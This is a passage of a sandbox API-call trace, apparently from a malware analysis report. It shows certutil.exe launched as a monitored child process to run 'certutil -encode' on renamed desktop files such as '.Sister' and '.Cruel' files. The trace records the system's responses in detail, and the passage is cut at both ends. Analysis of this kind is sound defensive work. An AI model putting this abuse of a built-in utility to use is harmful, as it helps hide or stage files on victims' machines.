_MaxCount=0x8) returned 15 [0206.907] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0206.907] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0206.907] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0206.907] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0206.907] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0206.907] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0206.907] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0206.907] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0206.907] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0206.907] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0206.907] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0206.907] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0206.907] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0206.907] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0206.907] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0206.907] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1d0b87ef98 | out: phkResult=0x1d0b87ef98*=0x23c) returned 0x0 [0206.907] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1c06a89d3a0 [0206.907] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x1d0b87f508, lpData=0x1d0b87f538, lpcbData=0x1d0b87f500*=0x4 | out: lpType=0x1d0b87f508*=0x0, lpData=0x1d0b87f538*=0x0, lpcbData=0x1d0b87f500*=0x4) returned 0x2 [0206.907] LocalFree (hMem=0x1c06a89d3a0) returned 0x0 [0206.907] RegCloseKey (hKey=0x23c) returned 0x0 [0206.907] LocalFree (hMem=0x0) returned 0x0 [0206.908] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1c06a8bbd70 [0206.918] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0206.918] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0206.918] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0206.918] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0206.919] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0206.919] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1c06a8c0ae0 [0206.919] GetComputerNameW (in: lpBuffer=0x1c06a8c0ae0, nSize=0x1d0b87f500 | out: lpBuffer="NQDPDE", nSize=0x1d0b87f500) returned 1 [0206.919] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x1d0b87f4d0 | out: lpBuffer=0x0, nSize=0x1d0b87f4d0) returned 0 [0206.920] GetLastError () returned 0xea [0206.920] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c06a8ab840 [0206.920] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1c06a8ab840, nSize=0x1d0b87f4d0 | out: lpBuffer="NQdPdE", nSize=0x1d0b87f4d0) returned 1 [0206.920] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0206.922] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1c06a8c0eb0, cbCertEncoded=0x2385) returned 0x0 [0206.924] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1c06a8c0eb0, cbCrlEncoded=0x2385) returned 0x0 [0206.924] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1c06a8c0eb0, cbEncoded=0x2385, dwFlags=0x8000, pDecodePara=0x1d0b87f3b0, pvStructInfo=0x1d0b87f440, pcbStructInfo=0x1d0b87f434 | out: pvStructInfo=0x1d0b87f440, pcbStructInfo=0x1d0b87f434) returned 0 [0206.924] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1c06a8c0eb0, cbEncoded=0x2385, dwFlags=0x8000, pDecodePara=0x1d0b87f3b0, pvStructInfo=0x1d0b87f440, pcbStructInfo=0x1d0b87f434 | out: pvStructInfo=0x1d0b87f440, pcbStructInfo=0x1d0b87f434) returned 0 [0206.925] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1c06a8c0eb0, cbEncoded=0x2385, dwFlags=0x8000, pDecodePara=0x1d0b87f3b0, pvStructInfo=0x1d0b87f440, pcbStructInfo=0x1d0b87f434 | out: pvStructInfo=0x1d0b87f440, pcbStructInfo=0x1d0b87f434) returned 0 [0206.925] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1c06a8a5640 [0206.932] CryptMsgUpdate (hCryptMsg=0x1c06a8a5640, pbData=0x1c06a8c0eb0, cbData=0x2385, fFinal=1) returned 0 [0206.932] GetLastError () returned 0x8009310b [0206.932] CryptMsgClose (hCryptMsg=0x1c06a8a5640) returned 1 [0206.933] GetFileAttributesExW (in: lpFileName="1KOAcYCUfFYg9R3cp_.ods.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods.sister"), fInfoLevelId=0x0, lpFileInformation=0x1d0b87f460 | out: lpFileInformation=0x1d0b87f460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46463cd0, ftCreationTime.dwHighDateTime=0x1d5ec98, ftLastAccessTime.dwLowDateTime=0xb6b41e00, ftLastAccessTime.dwHighDateTime=0x1d5eb31, ftLastWriteTime.dwLowDateTime=0xb6b41e00, ftLastWriteTime.dwHighDateTime=0x1d5eb31, nFileSizeHigh=0x0, nFileSizeLow=0x2385)) returned 1 [0206.933] _vsnwprintf (in: _Buffer=0x1d0b87f468, _BufferCount=0xb, _Format="%d", _ArgList=0x1d0b87f458 | out: _Buffer="359") returned 3 [0206.933] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x1d0b87f220, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0206.933] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c06a8c0ab0 [0206.933] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.933] _vsnwprintf (in: _Buffer=0x1d0b87e450, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x1d0b87f4a8 | out: _Buffer="Input Length = 9093") returned 19 [0206.933] GetFileType (hFile=0x50) returned 0x2 [0206.933] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1d0b87e450*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x1d0b87e404, lpReserved=0x0 | out: lpBuffer=0x1d0b87e450*, lpNumberOfCharsWritten=0x1d0b87e404*=0x13) returned 1 [0206.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.934] _vsnwprintf (in: _Buffer=0x1d0b87e450, _BufferCount=0x1ff, _Format="\n", _ArgList=0x1d0b87f4a8 | out: _Buffer="\n") returned 1 [0206.934] GetFileType (hFile=0x50) returned 0x2 [0206.934] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1d0b87e450*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1d0b87e404, lpReserved=0x0 | out: lpBuffer=0x1d0b87e450*, lpNumberOfCharsWritten=0x1d0b87e404*=0x1) returned 1 [0206.955] GetFileAttributesExW (in: lpFileName="1KOAcYCUfFYg9R3cp_.ods.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods.cruel"), fInfoLevelId=0x0, lpFileInformation=0x1d0b87f460 | out: lpFileInformation=0x1d0b87f460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5f45773, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xa5f45773, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa5f67d10, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x3110)) returned 1 [0206.956] _vsnwprintf (in: _Buffer=0x1d0b87f468, _BufferCount=0xb, _Format="%d", _ArgList=0x1d0b87f458 | out: _Buffer="361") returned 3 [0206.956] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x1d0b87f220, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0206.956] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1c06a8c0b10 [0206.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.956] _vsnwprintf (in: _Buffer=0x1d0b87e450, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x1d0b87f4a8 | out: _Buffer="Output Length = 12560") returned 21 [0206.956] GetFileType (hFile=0x50) returned 0x2 [0206.956] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1d0b87e450*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x1d0b87e404, lpReserved=0x0 | out: lpBuffer=0x1d0b87e450*, lpNumberOfCharsWritten=0x1d0b87e404*=0x15) returned 1 [0206.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.958] _vsnwprintf (in: _Buffer=0x1d0b87e450, _BufferCount=0x1ff, _Format="\n", _ArgList=0x1d0b87f4a8 | out: _Buffer="\n") returned 1 [0206.958] GetFileType (hFile=0x50) returned 0x2 [0206.959] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1d0b87e450*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1d0b87e404, lpReserved=0x0 | out: lpBuffer=0x1d0b87e450*, lpNumberOfCharsWritten=0x1d0b87e404*=0x1) returned 1 [0206.964] LocalFree (hMem=0x1c06a8c0eb0) returned 0x0 [0206.964] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0206.964] _vsnwprintf (in: _Buffer=0x1d0b87f4c8, _BufferCount=0xb, _Format="%d", _ArgList=0x1d0b87f4b8 | out: _Buffer="2022") returned 4 [0206.964] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x1d0b87f280, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0206.964] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1c06a899b40 [0206.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.964] _vsnwprintf (in: _Buffer=0x1d0b87e4b0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x1d0b87f508 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0206.964] GetFileType (hFile=0x50) returned 0x2 [0206.965] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1d0b87e4b0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x1d0b87e464, lpReserved=0x0 | out: lpBuffer=0x1d0b87e4b0*, lpNumberOfCharsWritten=0x1d0b87e464*=0x31) returned 1 [0206.966] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.966] _vsnwprintf (in: _Buffer=0x1d0b87e4b0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x1d0b87f508 | out: _Buffer="\n") returned 1 [0206.966] GetFileType (hFile=0x50) returned 0x2 [0206.966] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1d0b87e4b0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1d0b87e464, lpReserved=0x0 | out: lpBuffer=0x1d0b87e4b0*, lpNumberOfCharsWritten=0x1d0b87e464*=0x1) returned 1 [0206.974] LocalFree (hMem=0x0) returned 0x0 [0206.975] LocalFree (hMem=0x1c06a89ae80) returned 0x0 [0206.975] LocalFree (hMem=0x1c06a894440) returned 0x0 [0206.975] SetLastError (dwErrCode=0x80070716) [0206.975] _vsnwprintf (in: _Buffer=0x1d0b87f538, _BufferCount=0xb, _Format="%d", _ArgList=0x1d0b87f528 | out: _Buffer="511") returned 3 [0206.975] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x1d0b87f2f0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0206.975] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c06a8c0e10 [0206.975] PostQuitMessage (nExitCode=0) [0206.975] GetMessageW (in: lpMsg=0x1d0b87fb30, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1d0b87fb30) returned 0 [0206.975] LocalFree (hMem=0x1c06a8ab840) returned 0x0 [0206.975] LocalFree (hMem=0x1c06a8c0ae0) returned 0x0 [0206.976] LocalFree (hMem=0x0) returned 0x0 [0206.976] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0206.978] GetLastError () returned 0x7e [0206.979] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0206.979] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0206.979] DllMain () returned 0x1 [0206.979] LocalFree (hMem=0x1c06a8ab980) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a8a2050) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a8c0ab0) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a8c0b10) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a899b40) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a8c0e10) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a89cd50) returned 0x0 [0206.979] LocalFree (hMem=0x1c06a8a1db0) returned 0x0 [0206.979] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0206.980] GetLastError () returned 0x7e [0206.980] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0206.980] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0206.980] DllMain () returned 0x1 [0206.980] exit (_Code=0) Thread: id = 31 os_tid = 0x106c Process: id = "7" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x97d9000" os_pid = "0x50c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0xff8 [0207.532] GetStartupInfoW (in: lpStartupInfo=0xe7cd6bf7e0 | out: lpStartupInfo=0xe7cd6bf7e0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0207.532] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0207.532] __set_app_type (_Type=0x1) [0207.533] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0207.533] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0207.536] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0207.536] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0207.536] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0207.537] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0207.537] WerSetFlags () returned 0x0 [0207.537] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.537] __iob_func () returned 0x7ffcea2dea00 [0207.537] _fileno (_File=0x7ffcea2dea30) returned 1 [0207.537] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0207.537] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0207.538] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0207.539] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0207.539] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0207.539] GetConsoleOutputCP () returned 0x1b5 [0207.543] _vsnwprintf (in: _Buffer=0xe7cd6bf750, _BufferCount=0xb, _Format=".%d", _ArgList=0xe7cd6bf678 | out: _Buffer=".437") returned 4 [0207.543] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0207.543] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.543] GetFileType (hFile=0x50) returned 0x2 [0207.544] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0207.544] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0207.544] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.545] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0207.545] GetCommandLineW () returned="certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"" [0207.545] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2663271bd80 [0207.545] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2663270cf90 [0207.545] LocalFree (hMem=0x2663271bd80) returned 0x0 [0207.545] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2663270c2b0 [0207.545] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2663270c130 [0207.545] LocalFree (hMem=0x2663270c2b0) returned 0x0 [0207.545] LocalFree (hMem=0x2663270cf90) returned 0x0 [0207.545] LocalFree (hMem=0x0) returned 0x0 [0207.545] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0207.546] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0207.546] GetCommandLineW () returned="certutil -encode \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.jpg.Cruel\"" [0207.546] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2663271bd80 [0207.546] GetSystemTime (in: lpSystemTime=0xe7cd6bf440 | out: lpSystemTime=0xe7cd6bf440*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x2a, wMilliseconds=0x56)) [0207.546] SystemTimeToFileTime (in: lpSystemTime=0xe7cd6bf440, lpFileTime=0xe7cd6bf438 | out: lpFileTime=0xe7cd6bf438) returned 1 [0207.546] FileTimeToLocalFileTime (in: lpFileTime=0xe7cd6bf438, lpLocalFileTime=0xe7cd6bf400 | out: lpLocalFileTime=0xe7cd6bf400) returned 1 [0207.547] FileTimeToSystemTime (in: lpFileTime=0xe7cd6bf400, lpSystemTime=0xe7cd6bf170 | out: lpSystemTime=0xe7cd6bf170) returned 1 [0207.547] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xe7cd6bf170, lpFormat=0x0, lpDateStr=0xe7cd6bf280, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0207.547] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xe7cd6bf170, lpFormat=0x0, lpTimeStr=0xe7cd6bf180, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0207.547] _vsnwprintf (in: _Buffer=0xe7cd6bf18e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xe7cd6bf158 | out: _Buffer=" 42.086s") returned 8 [0207.547] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2663271e4b0 [0207.547] SetLastError (dwErrCode=0x80070716) [0207.547] _vsnwprintf (in: _Buffer=0xe7cd6bf208, _BufferCount=0xb, _Format="%d", _ArgList=0xe7cd6bf1f8 | out: _Buffer="948") returned 3 [0207.547] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xe7cd6befc0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0207.547] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2663271bb00 [0207.547] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x26632713f20 [0207.548] LocalFree (hMem=0x2663271e4b0) returned 0x0 [0207.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe7cd6bf4b0 | out: lpSystemTimeAsFileTime=0xe7cd6bf4b0*(dwLowDateTime=0xa6510cc8, dwHighDateTime=0x1d6141f)) [0207.548] GetLocalTime (in: lpSystemTime=0xe7cd6bf4e8 | out: lpSystemTime=0xe7cd6bf4e8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x2a, wMilliseconds=0x58)) [0207.548] SystemTimeToFileTime (in: lpSystemTime=0xe7cd6bf4e8, lpFileTime=0xe7cd6bf4c0 | out: lpFileTime=0xe7cd6bf4c0) returned 1 [0207.548] CompareFileTime (lpFileTime1=0xe7cd6bf4c0, lpFileTime2=0xe7cd6bf4b0) returned 1 [0207.548] _vsnwprintf (in: _Buffer=0xe7cd6bf4f8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xe7cd6bf488 | out: _Buffer="GMT + 2.00") returned 10 [0207.548] LocalFree (hMem=0x2663271bd80) returned 0x0 [0207.548] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffccc870000 [0207.548] FindResourceW (hModule=0x7ffccc870000, lpName=0x1, lpType=0x10) returned 0x7ffccc930090 [0207.548] LoadResource (hModule=0x7ffccc870000, hResInfo=0x7ffccc930090) returned 0x7ffccc9300b0 [0207.548] LockResource (hResData=0x7ffccc9300b0) returned 0x7ffccc9300b0 [0207.549] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0207.549] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xe7cd6bf528 | out: _Buffer="10.0.15063.447") returned 14 [0207.549] GetACP () returned 0x4e4 [0207.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0207.549] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2663271bc60 [0207.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2663271bc60, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0207.549] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2663271e7b0 [0207.549] _vsnwprintf (in: _Buffer=0x2663271e7b0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe7cd6bf578 | out: _Buffer="10.0.15063.447 retail") returned 21 [0207.549] LocalFree (hMem=0x2663271bc60) returned 0x0 [0207.549] LocalFree (hMem=0x0) returned 0x0 [0207.549] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0207.549] GetACP () returned 0x4e4 [0207.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0207.549] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2663271bec0 [0207.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2663271bec0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0207.549] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2663271e7f0 [0207.549] _vsnwprintf (in: _Buffer=0x2663271e7f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe7cd6bf578 | out: _Buffer="10.0.15063.447 retail") returned 21 [0207.549] LocalFree (hMem=0x2663271bec0) returned 0x0 [0207.549] LocalFree (hMem=0x0) returned 0x0 [0207.550] GetACP () returned 0x4e4 [0207.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0207.550] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2663271ba20 [0207.550] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2663271ba20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0207.550] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2663271e870 [0207.550] _vsnwprintf (in: _Buffer=0x2663271e870, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe7cd6bf5a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0207.550] LocalFree (hMem=0x2663271ba20) returned 0x0 [0207.550] LocalFree (hMem=0x2663271e7b0) returned 0x0 [0207.550] LocalFree (hMem=0x2663271e7f0) returned 0x0 [0207.550] LocalFree (hMem=0x2663271e870) returned 0x0 [0207.550] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0207.550] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0207.550] GetStockObject (i=0) returned 0x900010 [0207.550] RegisterClassW (lpWndClass=0xe7cd6bf6d0) returned 